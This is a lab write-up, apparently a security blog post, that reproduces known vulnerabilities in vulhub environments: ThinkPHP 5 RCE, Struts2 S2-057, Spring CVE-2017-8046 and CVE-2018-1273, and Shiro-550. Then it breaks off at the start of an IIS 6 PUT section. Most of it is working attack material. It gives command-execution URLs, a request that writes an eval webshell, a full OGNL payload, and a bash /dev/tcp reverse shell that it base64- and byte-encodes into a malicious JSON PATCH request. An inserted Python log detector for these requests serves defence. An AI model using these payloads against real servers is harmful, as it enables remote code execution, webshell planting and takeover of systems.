ThinkPHP: 5-rce
Lab: vulhub/thinkphp/5-rce

The root cause is the method() function in thinkphp/library/think/Request.php, which allows variable overwriting; by overwriting the class's core property filter, this leads to RCE. There are quite a few attack points, some of them with preconditions, and for various reasons some problems come up during exploitation.
Remote command execution
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Write PHP code into a file, then request it
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>


Write a one-line webshell
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell2.php&vars[1][]=<?php eval($_POST[cmd]);?>
Connect with a webshell client

Struts2: S2-057
vulhub target
Open the lab:
ip/struts2-showcase

Enter the following URL
http://1.92.134.1:8080/struts2-showcase/${(123+123)}/actionChain1.action
The page echoes the evaluated expression:
http://1.92.134.1:8080/struts2-showcase/246/register2.action
Replace the value of the verification payload above with our exploit:
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
Then URL-encode it and put it in the same position as above; the response shows the output of whoami.
Spring: CVE-2017-8046
Lab: spring/CVE-2017-8046
When the server handles a PATCH request, an attacker can craft a malicious PATCH request and send it to the spring-data-rest server; the crafted JSON data leads to execution of arbitrary Java code.
After starting the environment you see:

Requesting /customers returns:
{
"_embedded" : {
"customers" : [ {
"firstname" : "Dave",
"lastname" : "Matthews",
"gender" : "MALE",
"address" : {
"street" : "4711 Some Place",
"zipCode" : "54321",
"city" : "Charlottesville",
"state" : "VA"
},
"_links" : {
"self" : {
"href" : "http://1.92.134.1:8080/customers/1"
},
"customer" : {
"href" : "http://1.92.134.1:8080/customers/1"
}
}
} ]
},
"_links" : {
"self" : {
"href" : "http://1.92.134.1:8080/customers"
},
"profile" : {
"href" : "http://1.92.134.1:8080/profile/customers"
}
}
}
The following code block can be used to turn the command into its ASCII byte values:
python
payload = b'touch /tmp/success'
# list(payload) yields one int per byte; join them as a comma-separated Java byte[] literal
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
bash
bash -i >& /dev/tcp/192.168.177.142/6666 0>&1
base64
Base64-encoded reverse shell:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
Assemble the payload:
python
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'
# same conversion as above: each byte becomes a decimal value for the Java byte[] literal
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125
Send the request to /customers/1, adding the Content-Type header and the payload at the end:
http
PATCH /customers/1 HTTP/1.1
Host: 192.168.177.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json-patch+json
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 461
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]
Shell obtained successfully.

Spring: CVE-2018-1273
Set up the lab and open project-address/users

Fill in the form and capture the request with Burp

Insert the PoC:
http
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

Check the result in the container's terminal:
shell
docker exec -it 08d7538b367f /bin/bash

The reverse shell is left for another day.
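From the defender's side, the four request shapes walked through above (ThinkPHP invokefunction, the S2-057 OGNL path, the CVE-2017-8046 JSON Patch path and the CVE-2018-1273 form field) are easy to spot in access logs. The following detector is an added example, not part of the original write-up; the log lines are constructed to mirror the requests shown here, and the rule names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample request-log lines modelled on the requests in this
# write-up (hypothetical paths and values, not captured from a real system).
SAMPLE_LOGS = [
    'GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami',
    'GET /struts2-showcase/%24%7B%28123%2B123%29%7D/actionChain1.action',
    'PATCH /customers/1 [{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{105,100}))/lastname","value":"x"}]',
    'POST /users username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("id")]=&password=',
    'GET /index.php?s=index/user/login',
    'PATCH /customers/1 [{"op":"replace","path":"/lastname","value":"Smith"}]',
]

# (rule name, regex) pairs, applied after one round of URL-decoding.
RULES = [
    # ThinkPHP 5 route that dispatches straight to think\app::invokefunction
    ("thinkphp_invokefunction", re.compile(r"s=/?index/\\?think\\app/invokefunction", re.I)),
    # OGNL expression syntax ${...} or %{...} inside the URL path (S2-057)
    ("struts_ognl_in_path", re.compile(r"^\S+\s+/[^\s?]*[$%]\{")),
    # A JSON Patch "path" must be a JSON Pointer starting with "/"; anything
    # else (e.g. T(java.lang.Runtime)...) is SpEL, the CVE-2017-8046 root cause
    ("spring_data_rest_spel_path", re.compile(r'"path"\s*:\s*"(?!/)')),
    # SpEL injected through a property-path form field (CVE-2018-1273)
    ("spring_data_commons_spel_param", re.compile(r"\[#this\.|\[T\(", re.I)),
]


def scan_line(line: str) -> list[str]:
    """Return the names of every rule that fires on one log line."""
    decoded = unquote(line)  # decode %XX once, as the framework itself would
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_logs(lines: list[str]) -> dict[int, list[str]]:
    """Map the index of each suspicious line to the rules it triggered."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS).items():
        print(idx, hits, SAMPLE_LOGS[idx][:60])
```

The JSON Pointer check is the most robust of the four, since a legitimate RFC 6902 patch path always begins with "/"; the other rules are signature-style and should be tuned against your own traffic.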
Shiro: rememberMe deserialization vulnerability (Shiro-550)
vulhub lab: /shiro/CVE-2016-4437

Capture the request with Burp Suite, add rememberMe=123; to the Cookie field of the request, and check whether the response headers contain rememberMe=deleteMe. If they do, the system is using the Shiro framework:

Use a tool for the attack; doing it by hand, don't make me laugh.
https://github.com/j1anFen/shiro_attack

https://github.com/feihong-cs/ShiroExploit-Deprecated (reverse shell tool)
Middleware series
IIS 6.x
Reproducing the PUT vulnerability
Preparation: Windows Server 2003 with WebDAV enabled

Enable write access

Capture a request and check the supported methods by sending OPTIONS
